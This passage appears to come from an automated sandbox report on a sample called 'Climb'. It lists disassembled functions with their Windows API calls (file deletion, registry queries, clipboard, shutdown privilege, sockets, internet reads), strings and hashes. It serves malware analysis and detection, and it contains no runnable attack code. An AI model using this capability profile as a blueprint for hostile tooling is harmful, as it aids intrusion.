Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 1caaa1c599444035f56ff13414fb9dbc1d43f5c00de38c49144c86c8122bd9d7
Instruction ID: 8952c9b219a86d166ff8342d7d78653154ee31aa4f521017e30b1e2d3aa43e21
Opcode Fuzzy Hash: 1caaa1c599444035f56ff13414fb9dbc1d43f5c00de38c49144c86c8122bd9d7
Instruction Fuzzy Hash: AE31F5315012196BDF15EFF4DC4DAEE73ADAF14320F000292F816D2190EB74DA85CA65

Function 00AD4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AD4785
_wcslen.LIBCMT ref: 00AD47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AD4803
RemoveDirectoryW.KERNEL32(?), ref: 00AD4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AD489A
CloseHandle.KERNEL32(00000000), ref: 00AD48A5
CloseHandle.KERNEL32(00000000), ref: 00AD48B0

Strings

\??\%s, xrefs: 00AD47A0
\, xrefs: 00AD47BC
:, xrefs: 00AD47C7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: e0f3174437903278ea97779cb84a9a745a6ff1c077c8cb8a25c9e6c51734f226
Instruction ID: d9fdd621a5e7c6c39434c5785eb3428dbe44fb39b75faaf0f274b829f5feddc9
Opcode Fuzzy Hash: e0f3174437903278ea97779cb84a9a745a6ff1c077c8cb8a25c9e6c51734f226
Instruction Fuzzy Hash: 54318D71900249ABDB21DFA0DC49FEF37BDEF89740F1041B6F60A96160EB709645CB64

Function 00ADA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00ADA203
FindNextFileW.KERNEL32(00000000,?), ref: 00ADA25E
FindClose.KERNEL32(00000000), ref: 00ADA269
FindFirstFileW.KERNEL32(*.*,?), ref: 00ADA285
SetCurrentDirectoryW.KERNEL32(?), ref: 00ADA2D5
SetCurrentDirectoryW.KERNEL32(00B27B94), ref: 00ADA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ADA2FD
FindClose.KERNEL32(00000000), ref: 00ADA30A
FindClose.KERNEL32(00000000), ref: 00ADA31A

Part of subcall function 00ACE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ACE3B4

Strings

*.*, xrefs: 00ADA280

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: fdc5509ff700408ca27b23746848b546aff9e8a9472e37c890c8053f394ae052
Instruction ID: c6dc27444d10d840a64c9bcefad1a5fb8fd6792a0ca23157c45b8fd7835e8a52
Opcode Fuzzy Hash: fdc5509ff700408ca27b23746848b546aff9e8a9472e37c890c8053f394ae052
Instruction Fuzzy Hash: 4F3112315006196ACF15EFF5EC09EEE77AEAF55320F104192F816A32A0EB31DE86CA55

Function 00AEC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00AECA09
RegCloseKey.ADVAPI32(00000000), ref: 00AECA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AECA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AECB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AECBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AECC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00AECC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AECD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AECDE2
RegCloseKey.ADVAPI32(00000000), ref: 00AECDEF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 870f98e454c656c2dfc99ec790847fed9c895d19eb72912169df9e102a6c8b14
Instruction ID: c4aea25b1977aa5d64c4ad6161e88333a3726bc5cae6fc86663fb22b001100a8
Opcode Fuzzy Hash: 870f98e454c656c2dfc99ec790847fed9c895d19eb72912169df9e102a6c8b14
Instruction Fuzzy Hash: A7025171604240AFC715DF25C995E2ABBF5EF88314F1884ADF84ACB2A2DB31ED46CB51

Function 00ACD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871

Part of subcall function 00ACEAB0: GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1

FindFirstFileW.KERNEL32(?,?), ref: 00ACD9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00ACDA88
MoveFileW.KERNEL32(?,?), ref: 00ACDA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACDAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACDAE2

Part of subcall function 00ACDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00ACDAC7,?,?), ref: 00ACDB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00ACDAFE
FindClose.KERNEL32(00000000), ref: 00ACDB0F

Strings

\*.*, xrefs: 00ACD978, 00ACD981, 00ACD996

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 39d2b7d42b3f8e7c844a9f1d314d2a1f6ba6ce1bf8b47a3d191df52f3d6554f3
Instruction ID: bf520ab26f2b2a1a45c5182fe1b5e5f25a272266fbf216fc8cd555ebc1f5399d
Opcode Fuzzy Hash: 39d2b7d42b3f8e7c844a9f1d314d2a1f6ba6ce1bf8b47a3d191df52f3d6554f3
Instruction Fuzzy Hash: E7612E3180510DEECF16EBE0DA92EEDB7B5AF14340F6541A9E406B7191EB319F49CB60

Function 00ADF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00ADF7EE
EmptyClipboard.USER32 ref: 00ADF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00ADF809
CloseClipboard.USER32 ref: 00ADF900

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 0bec854ee339801e8ee2c1fadf42bf0dad4f74c5374cfd47788a445041a84ea4
Instruction ID: 9559a854a7d838ec7d33541e19e5810ef1e30cda54a528fc2a2692de7f2746fb
Opcode Fuzzy Hash: 0bec854ee339801e8ee2c1fadf42bf0dad4f74c5374cfd47788a445041a84ea4
Instruction Fuzzy Hash: F141AB34A04601AFD311CF55D888B6ABBE5FF44318F14C0AAE81A8F762CB35EC42DB91

Function 00ACF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC205A
Part of subcall function 00AC2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC2087
Part of subcall function 00AC2010: GetLastError.KERNEL32 ref: 00AC2097

ExitWindowsEx.USER32(?,00000000), ref: 00ACF249

Strings

, xrefs: 00ACF273
, xrefs: 00ACF237
SeShutdownPrivilege, xrefs: 00ACF219
@, xrefs: 00ACF23C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 4d91a8fc3a9e8af1d807aa22602444e1f6389661972b0136ebed72101807e416
Instruction ID: 7481e7bff31ad0da8f9da8d950c8ff8df1875df18d87221e9c74e486a9794f50
Opcode Fuzzy Hash: 4d91a8fc3a9e8af1d807aa22602444e1f6389661972b0136ebed72101807e416
Instruction Fuzzy Hash: 0001D67A6102106FEB1463F89D8AFFE72AD9B08344F170539FD03E21D2D9604D019190

Function 00A9BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A9BD54
_free.LIBCMT ref: 00A9BD78
_free.LIBCMT ref: 00A9BEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B046D0), ref: 00A9BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00B3221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A9BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00B32270,000000FF,?,0000003F,00000000,?), ref: 00A9BFB6
_free.LIBCMT ref: 00A9C0CB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 91a97bd1cea25cae3e9a49ac1a84b546c9a4c0a7d4927a95998ba70ab520a8e0
Instruction ID: e05ecb1ca4d32b1e5f778fdd7defb64c76c565b82985bd55480d3f7cad5e0808
Opcode Fuzzy Hash: 91a97bd1cea25cae3e9a49ac1a84b546c9a4c0a7d4927a95998ba70ab520a8e0
Instruction Fuzzy Hash: DAC11971B10209AFDF259F78EE41BAE7BF9EF45310F24419AE5419B291EB309E41CB60

Function 00AD3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA56C2,?,?,00000000,00000000), ref: 00AD3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA56C2,?,?,00000000,00000000), ref: 00AD3A35
LoadResource.KERNEL32(?,00000000,?,?,00AA56C2,?,?,00000000,00000000,?,?,?,?,?,?,00A666CE), ref: 00AD3A45
SizeofResource.KERNEL32(?,00000000,?,?,00AA56C2,?,?,00000000,00000000,?,?,?,?,?,?,00A666CE), ref: 00AD3A56
LockResource.KERNEL32(00AA56C2,?,?,00AA56C2,?,?,00000000,00000000,?,?,?,?,?,?,00A666CE,?), ref: 00AD3A65

Strings

SCRIPT, xrefs: 00AD3A2B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: a88cec8225e4b221a1e5553c0d8017c742d3ba382d5c9e163e95c27d71cadc8b
Instruction ID: 11a444d95b12979bf323ed631c529183906b0333b715a733879a0364ea937170
Opcode Fuzzy Hash: a88cec8225e4b221a1e5553c0d8017c742d3ba382d5c9e163e95c27d71cadc8b
Instruction Fuzzy Hash: 6C117C71200701BFDB218BA5DC48FA77BBAEBC5B90F14426DB402D6260DBB2DD01C661

Function 00AC20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AC1916
Part of subcall function 00AC1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AC1922
Part of subcall function 00AC1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AC1931
Part of subcall function 00AC1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AC1938
Part of subcall function 00AC1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AC194E

GetLengthSid.ADVAPI32(?,00000000,00AC1C81), ref: 00AC20FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AC2107
HeapAlloc.KERNEL32(00000000), ref: 00AC210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00AC2127
GetProcessHeap.KERNEL32(00000000,00000000,00AC1C81), ref: 00AC213B
HeapFree.KERNEL32(00000000), ref: 00AC2142

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 45cea27d94abecf51a989bb41c69b865da30badabd988610aeafef22af6e6186
Instruction ID: 5f362bc471032878ede2d599102396d744e7eef3b36cb8605a8fc3d36e704fee
Opcode Fuzzy Hash: 45cea27d94abecf51a989bb41c69b865da30badabd988610aeafef22af6e6186
Instruction Fuzzy Hash: 3A11AC71600204FFDB21DBE8DC09FAE7BBAEF45356F19421DE94297120C7359941DB64

Function 00ADA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00ADA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00ADA6D0

Part of subcall function 00AD42B9: GetInputState.USER32 ref: 00AD4310
Part of subcall function 00AD42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AD43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00ADA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00ADA6BA

Strings

*.*, xrefs: 00ADA5A2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 86fbc9de64559d1a7fba2a4c0d77a07a37769ca94bc0388d1568ad94415316ed
Instruction ID: 531ff510aa165c02fbc390f67fe20b8c785f578e88f8e5b7ec1447e58cf06307
Opcode Fuzzy Hash: 86fbc9de64559d1a7fba2a4c0d77a07a37769ca94bc0388d1568ad94415316ed
Instruction Fuzzy Hash: 8241717190020AEFCF15EFA4DD49AEEBBB5EF15310F144156E806A22A1EB31DE84CF61

Function 00A622AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00A6233E
GetSysColor.USER32(0000000F), ref: 00A62421
SetBkColor.GDI32(?,00000000), ref: 00A62434

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 59dc7d13f77897c5783c8603d5fdfb166d4a53f4a32ce4f0478bfa6eed33a49a
Instruction ID: 7dd7dedcdb8575f1fffd6a57af68ce02dc60b550fc12b7182d909a156769d7fc
Opcode Fuzzy Hash: 59dc7d13f77897c5783c8603d5fdfb166d4a53f4a32ce4f0478bfa6eed33a49a
Instruction Fuzzy Hash: 238102B1104904BEEA29AB788D98FBF297EEB47340B154509F202CF6D5CB59CE429376

Function 00AE2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AE3AD7
Part of subcall function 00AE3AAB: _wcslen.LIBCMT ref: 00AE3AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AE22BA
WSAGetLastError.WSOCK32 ref: 00AE22E1
bind.WSOCK32(00000000,?,00000010), ref: 00AE2338
WSAGetLastError.WSOCK32 ref: 00AE2343
closesocket.WSOCK32(00000000), ref: 00AE2372

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: dd6ba3a97ddfacc17dbdc0dc7ff3f8ae54dd67ce7b0628b268e885086dda1fbb
Instruction ID: ff3cde8849d04319a5d76cfd2f05dd66e180831082ecfec1891115ce70ccb689
Opcode Fuzzy Hash: dd6ba3a97ddfacc17dbdc0dc7ff3f8ae54dd67ce7b0628b268e885086dda1fbb
Instruction Fuzzy Hash: 9E51C375A00200AFE711EF64C986F6A77E9AB44758F08C098F9455F3C3DA75AD42CBE1

Function 00AF26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00AF275C
IsWindowEnabled.USER32 ref: 00AF276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00AF2777
IsIconic.USER32 ref: 00AF2785
IsZoomed.USER32 ref: 00AF2793

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: eb2bbcc87d1eb25e350dfff3dfad5b99972e80e4373f3d4c92d9b988bb19d705
Instruction ID: bc804842e7204ec04b0075352f7f52b215a629edc50c12d0969b2834160ec800
Opcode Fuzzy Hash: eb2bbcc87d1eb25e350dfff3dfad5b99972e80e4373f3d4c92d9b988bb19d705
Instruction Fuzzy Hash: 0321F4357002198FE711AFAAC844B7A7BE5EF85314F188069F949CB251D771EC42CB90

Function 00ADD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00ADD8CE
GetLastError.KERNEL32(?,00000000), ref: 00ADD92F
SetEvent.KERNEL32(?,?,00000000), ref: 00ADD943

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 317bef30ceb0ab54f6ee62569aef0c5c2286e05dad25262ac4d20a4d5efe300e
Instruction ID: ab523080e198cbbb68290e445fda52fc2d38e58d2a9493c9ce93594746bcd60b
Opcode Fuzzy Hash: 317bef30ceb0ab54f6ee62569aef0c5c2286e05dad25262ac4d20a4d5efe300e
Instruction Fuzzy Hash: F821CFB1500705EFE720DFA5C888BABBBFCEB40314F10441EE24692641E771EE05DB94

Function 00ACE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00AA46AC), ref: 00ACE482
